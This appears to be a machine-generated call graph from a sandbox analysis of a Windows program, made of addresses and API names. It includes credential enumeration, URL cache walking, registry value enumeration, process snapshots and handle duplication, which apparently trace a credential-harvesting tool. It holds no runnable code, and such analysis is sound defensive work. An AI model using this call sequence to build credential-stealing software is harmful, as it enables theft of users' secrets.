FreeLibrary 38230->38664 38231 44589f 38680 40b1ab free free 38231->38680 38241 414c2e 14 API calls 38232->38241 38233->38232 38237 445ba2 38233->38237 38246 409d1f 6 API calls 38234->38246 38247 445cc9 38235->38247 38750 4099c6 wcslen 38237->38750 38238 4456b2 38667 40b1ab free free 38238->38667 38239 40b2cc 27 API calls 38250 445a4f 38239->38250 38252 445be2 38241->38252 38242 403335 38381 4452e5 45 API calls 38242->38381 38255 445919 38243->38255 38665 4454bf 20 API calls 38244->38665 38245 445823 38245->38218 38264 4087b3 337 API calls 38245->38264 38257 4459bc 38246->38257 38258 409d1f 6 API calls 38247->38258 38248 445879 38248->38231 38268 4087b3 337 API calls 38248->38268 38629 409d1f wcslen wcslen 38250->38629 38262 40b2cc 27 API calls 38252->38262 38253 445d3d 38282 40b2cc 27 API calls 38253->38282 38254 445d88 memset memset memset 38256 414c2e 14 API calls 38254->38256 38681 409b98 GetFileAttributesW 38255->38681 38265 445dde 38256->38265 38746 409b98 GetFileAttributesW 38257->38746 38267 445ce1 38258->38267 38259 445bb3 38753 445403 memset 38259->38753 38260 445680 38260->38238 38502 4087b3 memset 38260->38502 38272 445bf3 38262->38272 38264->38245 38275 40b2cc 27 API calls 38265->38275 38770 409b98 GetFileAttributesW 38267->38770 38268->38248 38271->38206 38570 403e2d memset memset memset memset memset 38271->38570 38281 409d1f 6 API calls 38272->38281 38273 445928 38273->38198 38682 40b6ef 38273->38682 38283 445def 38275->38283 38276 4459cb 38276->38201 38294 40b6ef 249 API calls 38276->38294 38280 40b2cc 27 API calls 38286 445a94 38280->38286 38288 445c07 38281->38288 38289 445d54 _wcsicmp 38282->38289 38292 409d1f 6 API calls 38283->38292 38284->38242 38284->38253 38284->38254 38285 445389 255 API calls 38285->38219 38634 40ae18 38286->38634 38287 44566d 38287->38271 38553 413d4c 38287->38553 38297 445389 255 API calls 38288->38297 38298 445d71 38289->38298 38359 445d67 38289->38359 38291 445665 38666 40b1ab free free 38291->38666 38300 445e03 38292->38300 38294->38201 38302 445c17 38297->38302 38771 445093 23 API calls 38298->38771 38299 44563c 38299->38291 38304 4087b3 337 API calls 38299->38304 38772 409b98 GetFileAttributesW 38300->38772 38301 4456d8 38307 40b2cc 27 API calls 38301->38307 38308 40b2cc 27 API calls 38302->38308 38304->38299 38306 40b6ef 249 API calls 38306->38242 38312 4456e2 38307->38312 38313 445c23 38308->38313 38309 445d83 38309->38242 38311 445e12 38317 445e6b 38311->38317 38321 40b2cc 27 API calls 38311->38321 38668 413fa6 _wcsicmp _wcsicmp 38312->38668 38315 409d1f 6 API calls 38313->38315 38319 445c37 38315->38319 38316 445b17 38747 40aebe 38316->38747 38774 445093 23 API calls 38317->38774 38318 4456eb 38324 4456fd memset memset memset memset 38318->38324 38325 4457ea 38318->38325 38326 445389 255 API calls 38319->38326 38328 445e33 38321->38328 38669 409c70 wcscpy wcsrchr 38324->38669 38672 413d29 38325->38672 38327 445c47 38326->38327 38333 40b2cc 27 API calls 38327->38333 38334 409d1f 6 API calls 38328->38334 38330 445e7e 38335 445f67 38330->38335 38338 445c53 38333->38338 38339 445e47 38334->38339 38340 40b2cc 27 API calls 38335->38340 38336 445ab2 memset 38341 40b2cc 27 API calls 38336->38341 38337 409c70 2 API calls 38342 44577e 38337->38342 38343 409d1f 6 API calls 38338->38343 38773 409b98 GetFileAttributesW 38339->38773 38345 445f73 38340->38345 38346 445aa1 38341->38346 38347 409c70 2 API calls 38342->38347 38348 445c67 38343->38348 38350 409d1f 6 API calls 38345->38350 38346->38316 38346->38336 38351 409d1f 6 API calls 38346->38351 38641 40add4 38346->38641 38646 445389 38346->38646 38655 40ae51 38346->38655 38352 44578d 38347->38352 38353 445389 255 API calls 38348->38353 38349 445e56 38349->38317 38356 445e83 memset 38349->38356 38354 445f87 38350->38354 38351->38346 38352->38325 38358 40b2cc 27 API calls 38352->38358 38353->38219 38777 409b98 GetFileAttributesW 38354->38777 38360 40b2cc 27 API calls 38356->38360 38361 4457a8 38358->38361 38359->38242 38359->38306 38362 445eab 38360->38362 38363 409d1f 6 API calls 38361->38363 38364 409d1f 6 API calls 38362->38364 38365 4457b8 38363->38365 38366 445ebf 38364->38366 38671 409b98 GetFileAttributesW 38365->38671 38368 40ae18 9 API calls 38366->38368 38376 445ef5 38368->38376 38369 4457c7 38369->38325 38371 4087b3 337 API calls 38369->38371 38370 40ae51 9 API calls 38370->38376 38371->38325 38372 445f5c 38373 40aebe FindClose 38372->38373 38373->38335 38374 40add4 2 API calls 38374->38376 38375 40b2cc 27 API calls 38375->38376 38376->38370 38376->38372 38376->38374 38376->38375 38377 409d1f 6 API calls 38376->38377 38379 445f3a 38376->38379 38775 409b98 GetFileAttributesW 38376->38775 38377->38376 38776 445093 23 API calls 38379->38776 38381->38181 38382->38183 38383->38181 38384->38176 38386 40c775 38385->38386 38778 40b1ab free free 38386->38778 38388 40c788 38779 40b1ab free free 38388->38779 38390 40c790 38780 40b1ab free free 38390->38780 38392 40c798 38393 40aa04 free 38392->38393 38394 40c7a0 38393->38394 38781 40c274 memset 38394->38781 38399 40a8ab 9 API calls 38400 40c7c3 38399->38400 38401 40a8ab 9 API calls 38400->38401 38402 40c7d0 38401->38402 38810 40c3c3 38402->38810 38406 40c877 38415 40bdb0 38406->38415 38407 40c86c 38836 4053fe 39 API calls 38407->38836 38410 40c813 _wcslwr 38834 40c634 49 API calls 38410->38834 38412 40c829 wcslen 38413 40c7e5 38412->38413 38413->38406 38413->38407 38833 40a706 wcslen memcpy 38413->38833 38835 40c634 49 API calls 38413->38835 39021 404363 38415->39021 38418 40bf5d 39041 40440c 38418->39041 38420 40bdee 38420->38418 38423 40b2cc 27 API calls 38420->38423 38421 40bddf CredEnumerateW 38421->38420 38424 40be02 wcslen 38423->38424 38424->38418 38431 40be1e 38424->38431 38425 40be26 wcsncmp 38425->38431 38428 40be7d memset 38429 40bea7 memcpy 38428->38429 38428->38431 38430 40bf11 wcschr 38429->38430 38429->38431 38430->38431 38431->38418 38431->38425 38431->38428 38431->38429 38431->38430 38432 40b2cc 27 API calls 38431->38432 38434 40bf43 LocalFree 38431->38434 39044 40bd5d 28 API calls 38431->39044 39045 404423 38431->39045 38433 40bef6 _wcsnicmp 38432->38433 38433->38430 38433->38431 38434->38431 38435 4135f7 39058 4135e0 38435->39058 38438 40b2cc 27 API calls 38439 41360d 38438->38439 38440 40a804 8 API calls 38439->38440 38441 413613 38440->38441 38442 41361b 38441->38442 38443 41363e 38441->38443 38444 40b273 27 API calls 38442->38444 38445 4135e0 FreeLibrary 38443->38445 38446 413625 GetProcAddress 38444->38446 38447 413643 38445->38447 38446->38443 38448 413648 38446->38448 38447->38205 38449 413658 38448->38449 38450 4135e0 FreeLibrary 38448->38450 38449->38205 38451 413666 38450->38451 38451->38205 39061 4449b9 38452->39061 38455 4449b9 42 API calls 38457 444b4b 38455->38457 38456 444c15 38459 4449b9 42 API calls 38456->38459 38457->38456 39082 444972 GetVersionExW 38457->39082 38460 444c1f 38459->38460 38460->38188 38461 444b99 memcmp 38466 444b8c 38461->38466 38462 444c0b 39086 444a85 42 API calls 38462->39086 38466->38461 38466->38462 39083 444aa5 42 API calls 38466->39083 39084 40a7a0 GetVersionExW 38466->39084 39085 444a85 42 API calls 38466->39085 38469 40399d 38468->38469 39087 403a16 38469->39087 38471 403a09 39101 40b1ab free free 38471->39101 38473 403a12 wcsrchr 38473->38203 38474 4039a3 38474->38471 38477 4039f4 38474->38477 39098 40a02c CreateFileW 38474->39098 38477->38471 38478 4099c6 2 API calls 38477->38478 38478->38471 38480 414c2e 14 API calls 38479->38480 38481 404048 38480->38481 38482 414c2e 14 API calls 38481->38482 38483 404056 38482->38483 38484 409d1f 6 API calls 38483->38484 38485 404073 38484->38485 38486 409d1f 6 API calls 38485->38486 38487 40408e 38486->38487 38488 409d1f 6 API calls 38487->38488 38489 4040a6 38488->38489 38490 403af5 20 API calls 38489->38490 38491 4040ba 38490->38491 38492 403af5 20 API calls 38491->38492 38493 4040cb 38492->38493 39128 40414f memset 38493->39128 38495 404140 39142 40b1ab free free 38495->39142 38497 4040ec memset 38500 4040e0 38497->38500 38498 404148 38498->38260 38499 4099c6 2 API calls 38499->38500 38500->38495 38500->38497 38500->38499 38501 40a8ab 9 API calls 38500->38501 38501->38500 39155 40a6e6 WideCharToMultiByte 38502->39155 38504 4087ed 39156 4095d9 memset 38504->39156 38507 408809 memset memset memset memset memset 38508 40b2cc 27 API calls 38507->38508 38509 4088a1 38508->38509 38510 409d1f 6 API calls 38509->38510 38511 4088b1 38510->38511 38512 40b2cc 27 API calls 38511->38512 38513 4088c0 38512->38513 38514 409d1f 6 API calls 38513->38514 38515 4088d0 38514->38515 38516 40b2cc 27 API calls 38515->38516 38517 4088df 38516->38517 38518 409d1f 6 API calls 38517->38518 38519 4088ef 38518->38519 38520 40b2cc 27 API calls 38519->38520 38521 4088fe 38520->38521 38522 409d1f 6 API calls 38521->38522 38523 40890e 38522->38523 38524 40b2cc 27 API calls 38523->38524 38525 40891d 38524->38525 38526 409d1f 6 API calls 38525->38526 38527 40892d 38526->38527 39175 409b98 GetFileAttributesW 38527->39175 38529 40893e 38530 408943 38529->38530 38531 408958 38529->38531 39176 407fdf 75 API calls 38530->39176 39177 409b98 GetFileAttributesW 38531->39177 38534 408953 38534->38260 38535 408964 38536 408969 38535->38536 38537 40897b 38535->38537 39178 4082c7 198 API calls 38536->39178 39179 409b98 GetFileAttributesW 38537->39179 38540 408987 38541 4089a1 38540->38541 38542 40898c 38540->38542 39181 409b98 GetFileAttributesW 38541->39181 38554 40b633 free 38553->38554 38555 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38554->38555 38556 413f00 Process32NextW 38555->38556 38557 413da5 OpenProcess 38556->38557 38558 413f17 CloseHandle 38556->38558 38559 413eb0 38557->38559 38560 413df3 memset 38557->38560 38558->38301 38559->38556 38562 413ebf free 38559->38562 38563 4099f4 3 API calls 38559->38563 39445 413f27 38560->39445 38562->38559 38563->38559 38564 413e37 GetModuleHandleW 38566 413e46 GetProcAddress 38564->38566 38567 413e1f 38564->38567 38566->38567 38567->38564 39450 413959 38567->39450 39466 413ca4 38567->39466 38569 413ea2 CloseHandle 38569->38559 38571 414c2e 14 API calls 38570->38571 38572 403eb7 38571->38572 38573 414c2e 14 API calls 38572->38573 38574 403ec5 38573->38574 38575 409d1f 6 API calls 38574->38575 38576 403ee2 38575->38576 38577 409d1f 6 API calls 38576->38577 38578 403efd 38577->38578 38579 409d1f 6 API calls 38578->38579 38580 403f15 38579->38580 38581 403af5 20 API calls 38580->38581 38582 403f29 38581->38582 38583 403af5 20 API calls 38582->38583 38584 403f3a 38583->38584 38585 40414f 33 API calls 38584->38585 38591 403f4f 38585->38591 38586 403faf 39480 40b1ab free free 38586->39480 38588 403f5b memset 38588->38591 38589 403fb7 38589->38245 38590 4099c6 2 API calls 38590->38591 38591->38586 38591->38588 38591->38590 38592 40a8ab 9 API calls 38591->38592 38592->38591 38594 414c2e 14 API calls 38593->38594 38595 403d26 38594->38595 38596 414c2e 14 API calls 38595->38596 38597 403d34 38596->38597 38598 409d1f 6 API calls 38597->38598 38599 403d51 38598->38599 38600 409d1f 6 API calls 38599->38600 38601 403d6c 38600->38601 38602 409d1f 6 API calls 38601->38602 38603 403d84 38602->38603 38604 403af5 20 API calls 38603->38604 38605 403d98 38604->38605 38606 403af5 20 API calls 38605->38606 38607 403da9 38606->38607 38608 40414f 33 API calls 38607->38608 38609 403dbe 38608->38609 38610 403e1e 38609->38610 38611 403dca memset 38609->38611 38614 4099c6 2 API calls 38609->38614 38615 40a8ab 9 API calls 38609->38615 39481 40b1ab free free 38610->39481 38611->38609 38613 403e26 38613->38248 38614->38609 38615->38609 38617 414b81 9 API calls 38616->38617 38618 414c40 38617->38618 38619 414c73 memset 38618->38619 39482 409cea 38618->39482 38623 414c94 38619->38623 38622 414c64 38622->38239 38624 414cf4 wcscpy 38623->38624 39485 414bb0 wcscpy 38623->39485 38624->38622 38626 414cd2 39486 4145ac RegQueryValueExW 38626->39486 38628 414ce9 38628->38624 38630 409d62 38629->38630 38631 409d43 wcscpy 38629->38631 38630->38280 38632 409719 2 API calls 38631->38632 38633 409d51 wcscat 38632->38633 38633->38630 38635 40aebe FindClose 38634->38635 38636 40ae21 38635->38636 38637 4099c6 2 API calls 38636->38637 38638 40ae35 38637->38638 38639 409d1f 6 API calls 38638->38639 38640 40ae49 38639->38640 38640->38346 38642 40ade0 38641->38642 38645 40ae0f 38641->38645 38643 40ade7 wcscmp 38642->38643 38642->38645 38644 40adfe wcscmp 38643->38644 38643->38645 38644->38645 38645->38346 38647 40ae18 9 API calls 38646->38647 38653 4453c4 38647->38653 38648 40ae51 9 API calls 38648->38653 38649 4453f3 38651 40aebe FindClose 38649->38651 38650 40add4 2 API calls 38650->38653 38652 4453fe 38651->38652 38652->38346 38653->38648 38653->38649 38653->38650 38654 445403 250 API calls 38653->38654 38654->38653 38656 40ae7b FindNextFileW 38655->38656 38657 40ae5c FindFirstFileW 38655->38657 38658 40ae94 38656->38658 38659 40ae8f 38656->38659 38657->38658 38661 40aeb6 38658->38661 38662 409d1f 6 API calls 38658->38662 38660 40aebe FindClose 38659->38660 38660->38658 38661->38346 38662->38661 38663->38230 38664->38210 38665->38299 38666->38287 38667->38287 38668->38318 38670 409c89 38669->38670 38670->38337 38671->38369 38673 413d39 38672->38673 38674 413d2f FreeLibrary 38672->38674 38675 40b633 free 38673->38675 38674->38673 38676 413d42 38675->38676 38677 40b633 free 38676->38677 38678 413d4a 38677->38678 38678->38271 38679->38206 38680->38196 38681->38273 38683 44db70 38682->38683 38684 40b6fc memset 38683->38684 38685 409c70 2 API calls 38684->38685 38686 40b732 wcsrchr 38685->38686 38687 40b743 38686->38687 38688 40b746 memset 38686->38688 38687->38688 38689 40b2cc 27 API calls 38688->38689 38690 40b76f 38689->38690 38691 409d1f 6 API calls 38690->38691 38692 40b783 38691->38692 39487 409b98 GetFileAttributesW 38692->39487 38694 40b7c2 39488 40bb98 38694->39488 38695 40b792 38695->38694 38696 409c70 2 API calls 38695->38696 38698 40b7a5 38696->38698 38700 40b2cc 27 API calls 38698->38700 38703 40b7b2 38700->38703 38701 40b837 CloseHandle 38705 40b83e memset 38701->38705 38702 40b817 39522 409a45 GetTempPathW 38702->39522 38707 409d1f 6 API calls 38703->38707 39521 40a6e6 WideCharToMultiByte 38705->39521 38707->38694 38708 40b827 38708->38705 38709 40b866 38710 444432 120 API calls 38709->38710 38711 40b879 38710->38711 38712 40bad5 38711->38712 38713 40b273 27 API calls 38711->38713 38715 40b04b ??3@YAXPAX 38712->38715 38714 40b89a 38713->38714 38716 438552 133 API calls 38714->38716 38717 40baf3 38715->38717 38718 40b8a4 38716->38718 38717->38198 38719 40bacd 38718->38719 38721 4251c4 136 API calls 38718->38721 38720 443d90 110 API calls 38719->38720 38720->38712 38743 40b8b8 38721->38743 38722 40bac6 39534 424f26 122 API calls 38722->39534 38723 40b8bd memset 39525 425413 17 API calls 38723->39525 38726 425413 17 API calls 38726->38743 38729 40a71b MultiByteToWideChar 38729->38743 38732 40b9b5 memcmp 38732->38743 38733 4099c6 2 API calls 38733->38743 38734 404423 37 API calls 38734->38743 38736 4251c4 136 API calls 38736->38743 38737 40bb3e memset memcpy 39535 40a734 MultiByteToWideChar 38737->39535 38740 40bb88 LocalFree 38740->38743 38743->38722 38743->38723 38743->38726 38743->38729 38743->38732 38743->38733 38743->38734 38743->38736 38743->38737 38744 40ba5f memcmp 38743->38744 38745 40a734 MultiByteToWideChar 38743->38745 39526 4253ef 16 API calls 38743->39526 39527 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38743->39527 39528 4253af 17 API calls 38743->39528 39529 4253cf 17 API calls 38743->39529 39530 447280 memset 38743->39530 39531 447960 memset memcpy memcpy memcpy 38743->39531 39532 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38743->39532 39533 447920 memcpy memcpy memcpy 38743->39533 38744->38743 38745->38743 38746->38276 38748 40aed1 38747->38748 38749 40aec7 FindClose 38747->38749 38748->38213 38749->38748 38751 4099d7 38750->38751 38752 4099da memcpy 38750->38752 38751->38752 38752->38259 38754 40b2cc 27 API calls 38753->38754 38755 44543f 38754->38755 38756 409d1f 6 API calls 38755->38756 38757 44544f 38756->38757 39624 409b98 GetFileAttributesW 38757->39624 38759 44545e 38760 445476 38759->38760 38761 40b6ef 249 API calls 38759->38761 38762 40b2cc 27 API calls 38760->38762 38761->38760 38763 445482 38762->38763 38764 409d1f 6 API calls 38763->38764 38765 445492 38764->38765 39625 409b98 GetFileAttributesW 38765->39625 38767 4454a1 38768 4454b9 38767->38768 38769 40b6ef 249 API calls 38767->38769 38768->38285 38769->38768 38770->38284 38771->38309 38772->38311 38773->38349 38774->38330 38775->38376 38776->38376 38777->38359 38778->38388 38779->38390 38780->38392 38782 414c2e 14 API calls 38781->38782 38783 40c2ae 38782->38783 38837 40c1d3 38783->38837 38788 40c3be 38805 40a8ab 38788->38805 38789 40afcf 2 API calls 38790 40c2fd FindFirstUrlCacheEntryW 38789->38790 38791 40c3b6 38790->38791 38792 40c31e wcschr 38790->38792 38793 40b04b ??3@YAXPAX 38791->38793 38794 40c331 38792->38794 38795 40c35e FindNextUrlCacheEntryW 38792->38795 38793->38788 38797 40a8ab 9 API calls 38794->38797 38795->38792 38796 40c373 GetLastError 38795->38796 38798 40c3ad FindCloseUrlCache 38796->38798 38799 40c37e 38796->38799 38800 40c33e wcschr 38797->38800 38798->38791 38801 40afcf 2 API calls 38799->38801 38800->38795 38802 40c34f 38800->38802 38803 40c391 FindNextUrlCacheEntryW 38801->38803 38804 40a8ab 9 API calls 38802->38804 38803->38792 38803->38798 38804->38795 38953 40a97a 38805->38953 38808 40a8cc 38808->38399 38959 40b1ab free free 38810->38959 38812 40c3dd 38813 40b2cc 27 API calls 38812->38813 38814 40c3e7 38813->38814 38815 40c50e 38814->38815 38816 40c3ff 38814->38816 38830 405337 38815->38830 38817 40a9ce 4 API calls 38816->38817 38818 40c418 memset 38817->38818 38960 40aa1d 38818->38960 38821 40c471 38823 40c47a _wcsupr 38821->38823 38822 40c505 38822->38815 38962 40a8d0 7 API calls 38823->38962 38825 40c498 38963 40a8d0 7 API calls 38825->38963 38827 40c4ac memset 38828 40aa1d 38827->38828 38829 40c4e4 RegEnumValueW 38828->38829 38829->38822 38829->38823 38964 405220 38830->38964 38833->38410 38834->38412 38835->38413 38836->38406 38838 40ae18 9 API calls 38837->38838 38844 40c210 38838->38844 38839 40ae51 9 API calls 38839->38844 38840 40c264 38841 40aebe FindClose 38840->38841 38843 40c26f 38841->38843 38842 40add4 2 API calls 38842->38844 38849 40e5ed memset memset 38843->38849 38844->38839 38844->38840 38844->38842 38845 40c231 _wcsicmp 38844->38845 38846 40c1d3 34 API calls 38844->38846 38845->38844 38847 40c248 38845->38847 38846->38844 38862 40c084 21 API calls 38847->38862 38850 414c2e 14 API calls 38849->38850 38851 40e63f 38850->38851 38852 409d1f 6 API calls 38851->38852 38853 40e658 38852->38853 38863 409b98 GetFileAttributesW 38853->38863 38855 40e667 38856 409d1f 6 API calls 38855->38856 38858 40e680 38855->38858 38856->38858 38864 409b98 GetFileAttributesW 38858->38864 38859 40e68f 38860 40c2d8 38859->38860 38865 40e4b2 38859->38865 38860->38788 38860->38789 38862->38844 38863->38855 38864->38859 38886 40e01e 38865->38886 38867 40e593 38869 40e5b0 38867->38869 38870 40e59c DeleteFileW 38867->38870 38868 40e521 38868->38867 38909 40e175 38868->38909 38871 40b04b ??3@YAXPAX 38869->38871 38870->38869 38872 40e5bb 38871->38872 38874 40e5c4 CloseHandle 38872->38874 38875 40e5cc 38872->38875 38874->38875 38877 40b633 free 38875->38877 38876 40e573 38878 40e584 38876->38878 38879 40e57c CloseHandle 38876->38879 38880 40e5db 38877->38880 38952 40b1ab free free 38878->38952 38879->38878 38883 40b633 free 38880->38883 38882 40e540 38882->38876 38929 40e2ab 38882->38929 38884 40e5e3 38883->38884 38884->38860 38887 406214 22 API calls 38886->38887 38888 40e03c 38887->38888 38889 40e16b 38888->38889 38890 40dd85 74 API calls 38888->38890 38889->38868 38891 40e06b 38890->38891 38891->38889 38892 40afcf ??2@YAPAXI ??3@YAXPAX 38891->38892 38893 40e08d OpenProcess 38892->38893 38894 40e0a4 GetCurrentProcess DuplicateHandle 38893->38894 38898 40e152 38893->38898 38895 40e0d0 GetFileSize 38894->38895 38896 40e14a CloseHandle 38894->38896 38899 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38895->38899 38896->38898 38897 40e160 38901 40b04b ??3@YAXPAX 38897->38901 38898->38897 38900 406214 22 API calls 38898->38900 38902 40e0ea 38899->38902 38900->38897 38901->38889 38903 4096dc CreateFileW 38902->38903 38904 40e0f1 CreateFileMappingW 38903->38904 38905 40e140 CloseHandle CloseHandle 38904->38905 38906 40e10b MapViewOfFile 38904->38906 38905->38896 38907 40e13b CloseHandle 38906->38907 38908 40e11f WriteFile UnmapViewOfFile 38906->38908 38907->38905 38908->38907 38910 40e18c 38909->38910 38911 406b90 11 API calls 38910->38911 38912 40e19f 38911->38912 38913 40e1a7 memset 38912->38913 38914 40e299 38912->38914 38919 40e1e8 38913->38919 38915 4069a3 ??3@YAXPAX free 38914->38915 38916 40e2a4 38915->38916 38916->38882 38917 406e8f 13 API calls 38917->38919 38918 406b53 SetFilePointerEx ReadFile 38918->38919 38919->38917 38919->38918 38920 40dd50 _wcsicmp 38919->38920 38921 40e283 38919->38921 38925 40742e 8 API calls 38919->38925 38926 40aae3 wcslen wcslen _memicmp 38919->38926 38927 40e244 _snwprintf 38919->38927 38920->38919 38922 40e291 38921->38922 38923 40e288 free 38921->38923 38924 40aa04 free 38922->38924 38923->38922 38924->38914 38925->38919 38926->38919 38928 40a8d0 7 API calls 38927->38928 38928->38919 38930 40e2c2 38929->38930 38931 406b90 11 API calls 38930->38931 38947 40e2d3 38931->38947 38932 40e4a0 38933 4069a3 ??3@YAXPAX free 38932->38933 38934 40e4ab 38933->38934 38934->38882 38935 406e8f 13 API calls 38935->38947 38936 406b53 SetFilePointerEx ReadFile 38936->38947 38937 40e489 38938 40aa04 free 38937->38938 38939 40e491 38938->38939 38939->38932 38940 40e497 free 38939->38940 38940->38932 38941 40dd50 _wcsicmp 38941->38947 38942 40dd50 _wcsicmp 38943 40e376 memset 38942->38943 38944 40aa29 6 API calls 38943->38944 38944->38947 38945 40742e 8 API calls 38945->38947 38946 40e3e0 memcpy 38946->38947 38947->38932 38947->38935 38947->38936 38947->38937 38947->38941 38947->38942 38947->38945 38947->38946 38948 40e3b3 wcschr 38947->38948 38949 40e3fb memcpy 38947->38949 38950 40e416 memcpy 38947->38950 38951 40e431 memcpy 38947->38951 38948->38947 38949->38947 38950->38947 38951->38947 38952->38867 38956 40a980 38953->38956 38954 40a995 _wcsicmp 38954->38956 38955 40a99c wcscmp 38955->38956 38956->38954 38956->38955 38957 40a8bb 38956->38957 38957->38808 38958 40a8d0 7 API calls 38957->38958 38958->38808 38959->38812 38961 40aa23 RegEnumValueW 38960->38961 38961->38821 38961->38822 38962->38825 38963->38827 38965 405335 38964->38965 38966 40522a 38964->38966 38965->38413 38967 40b2cc 27 API calls 38966->38967 38968 405234 38967->38968 38969 40a804 8 API calls 38968->38969 38970 40523a 38969->38970 39009 40b273 38970->39009 38972 405248 _mbscpy _mbscat GetProcAddress 38973 40b273 27 API calls 38972->38973 38974 405279 38973->38974 39012 405211 GetProcAddress 38974->39012 38976 405282 38977 40b273 27 API calls 38976->38977 38978 40528f 38977->38978 39013 405211 GetProcAddress 38978->39013 38980 405298 38981 40b273 27 API calls 38980->38981 38982 4052a5 38981->38982 39014 405211 GetProcAddress 38982->39014 38984 4052ae 38985 40b273 27 API calls 38984->38985 38986 4052bb 38985->38986 39015 405211 GetProcAddress 38986->39015 38988 4052c4 38989 40b273 27 API calls 38988->38989 38990 4052d1 38989->38990 39016 405211 GetProcAddress 38990->39016 38992 4052da 38993 40b273 27 API calls 38992->38993 38994 4052e7 38993->38994 39017 405211 GetProcAddress 38994->39017 38996 4052f0 38997 40b273 27 API calls 38996->38997 38998 4052fd 38997->38998 39018 405211 GetProcAddress 38998->39018 39000 405306 39001 40b273 27 API calls 39000->39001 39002 405313 39001->39002 39019 405211 GetProcAddress 39002->39019 39004 40531c 39005 40b273 27 API calls 39004->39005 39006 405329 39005->39006 39020 405211 GetProcAddress 39006->39020 39008 405332 39008->38965 39010 40b58d 27 API calls 39009->39010 39011 40b18c 39010->39011 39011->38972 39012->38976 39013->38980 39014->38984 39015->38988 39016->38992 39017->38996 39018->39000 39019->39004 39020->39008 39022 40440c FreeLibrary 39021->39022 39023 40436d 39022->39023 39024 40a804 8 API calls 39023->39024 39025 404377 39024->39025 39026 404383 39025->39026 39027 404405 39025->39027 39028 40b273 27 API calls 39026->39028 39027->38418 39027->38420 39027->38421 39029 40438d GetProcAddress 39028->39029 39030 40b273 27 API calls 39029->39030 39031 4043a7 GetProcAddress 39030->39031 39032 40b273 27 API calls 39031->39032 39033 4043ba GetProcAddress 39032->39033 39034 40b273 27 API calls 39033->39034 39035 4043ce GetProcAddress 39034->39035 39036 40b273 27 API calls 39035->39036 39037 4043e2 GetProcAddress 39036->39037 39038 4043f1 39037->39038 39039 4043f7 39038->39039 39040 40440c FreeLibrary 39038->39040 39039->39027 39040->39027 39042 404413 FreeLibrary 39041->39042 39043 40441e 39041->39043 39042->39043 39043->38435 39044->38431 39046 40442e 39045->39046 39047 40447e 39045->39047 39048 40b2cc 27 API calls 39046->39048 39047->38431 39049 404438 39048->39049 39050 40a804 8 API calls 39049->39050 39051 40443e 39050->39051 39052 404445 39051->39052 39053 404467 39051->39053 39054 40b273 27 API calls 39052->39054 39053->39047 39056 404475 FreeLibrary 39053->39056 39055 40444f GetProcAddress 39054->39055 39055->39053 39057 404460 39055->39057 39056->39047 39057->39053 39059 4135f6 39058->39059 39060 4135eb FreeLibrary 39058->39060 39059->38438 39060->39059 39062 4449c4 39061->39062 39063 444a52 39061->39063 39064 40b2cc 27 API calls 39062->39064 39063->38455 39063->38460 39065 4449cb 39064->39065 39066 40a804 8 API calls 39065->39066 39067 4449d1 39066->39067 39068 40b273 27 API calls 39067->39068 39069 4449dc GetProcAddress 39068->39069 39070 40b273 27 API calls 39069->39070 39071 4449f3 GetProcAddress 39070->39071 39072 40b273 27 API calls 39071->39072 39073 444a04 GetProcAddress 39072->39073 39074 40b273 27 API calls 39073->39074 39075 444a15 GetProcAddress 39074->39075 39076 40b273 27 API calls 39075->39076 39077 444a26 GetProcAddress 39076->39077 39078 40b273 27 API calls 39077->39078 39079 444a37 GetProcAddress 39078->39079 39080 40b273 27 API calls 39079->39080 39081 444a48 GetProcAddress 39080->39081 39081->39063 39082->38466 39083->38466 39084->38466 39085->38466 39086->38456 39088 403a29 39087->39088 39102 403bed memset memset 39088->39102 39090 403ae7 39115 40b1ab free free 39090->39115 39091 403a3f memset 39096 403a2f 39091->39096 39093 403aef 39093->38474 39094 40a8d0 7 API calls 39094->39096 39095 409d1f 6 API calls 39095->39096 39096->39090 39096->39091 39096->39094 39096->39095 39097 409b98 GetFileAttributesW 39096->39097 39097->39096 39099 40a051 GetFileTime CloseHandle 39098->39099 39100 4039ca CompareFileTime 39098->39100 39099->39100 39100->38474 39101->38473 39103 414c2e 14 API calls 39102->39103 39104 403c38 39103->39104 39105 409719 2 API calls 39104->39105 39106 403c3f wcscat 39105->39106 39107 414c2e 14 API calls 39106->39107 39108 403c61 39107->39108 39109 409719 2 API calls 39108->39109 39110 403c68 wcscat 39109->39110 39116 403af5 39110->39116 39113 403af5 20 API calls 39114 403c95 39113->39114 39114->39096 39115->39093 39117 403b02 39116->39117 39118 40ae18 9 API calls 39117->39118 39126 403b37 39118->39126 39119 403bdb 39120 40aebe FindClose 39119->39120 39121 403be6 39120->39121 39121->39113 39122 40ae18 9 API calls 39122->39126 39123 40ae51 9 API calls 39123->39126 39124 40aebe FindClose 39124->39126 39125 40add4 wcscmp wcscmp 39125->39126 39126->39119 39126->39122 39126->39123 39126->39124 39126->39125 39127 40a8d0 7 API calls 39126->39127 39127->39126 39129 409d1f 6 API calls 39128->39129 39130 404190 39129->39130 39143 409b98 GetFileAttributesW 39130->39143 39132 40419c 39133 4041a7 6 API calls 39132->39133 39134 40435c 39132->39134 39135 40424f 39133->39135 39134->38500 39135->39134 39137 40425e memset 39135->39137 39139 409d1f 6 API calls 39135->39139 39140 40a8ab 9 API calls 39135->39140 39144 414842 39135->39144 39137->39135 39138 404296 wcscpy 39137->39138 39138->39135 39139->39135 39141 4042b6 memset memset _snwprintf wcscpy 39140->39141 39141->39135 39142->38498 39143->39132 39147 41443e 39144->39147 39146 414866 39146->39135 39148 41444b 39147->39148 39149 414451 39148->39149 39150 4144a3 GetPrivateProfileStringW 39148->39150 39151 414491 39149->39151 39152 414455 wcschr 39149->39152 39150->39146 39154 414495 WritePrivateProfileStringW 39151->39154 39152->39151 39153 414463 _snwprintf 39152->39153 39153->39154 39154->39146 39155->38504 39157 40b2cc 27 API calls 39156->39157 39158 409615 39157->39158 39159 409d1f 6 API calls 39158->39159 39160 409625 39159->39160 39185 409b98 GetFileAttributesW 39160->39185 39162 409634 39163 409648 39162->39163 39186 4091b8 memset 39162->39186 39164 40b2cc 27 API calls 39163->39164 39167 408801 39163->39167 39166 40965d 39164->39166 39168 409d1f 6 API calls 39166->39168 39167->38507 39167->38534 39169 40966d 39168->39169 39238 409b98 GetFileAttributesW 39169->39238 39171 40967c 39171->39167 39172 409681 39171->39172 39239 409529 72 API calls 39172->39239 39174 409690 39174->39167 39175->38529 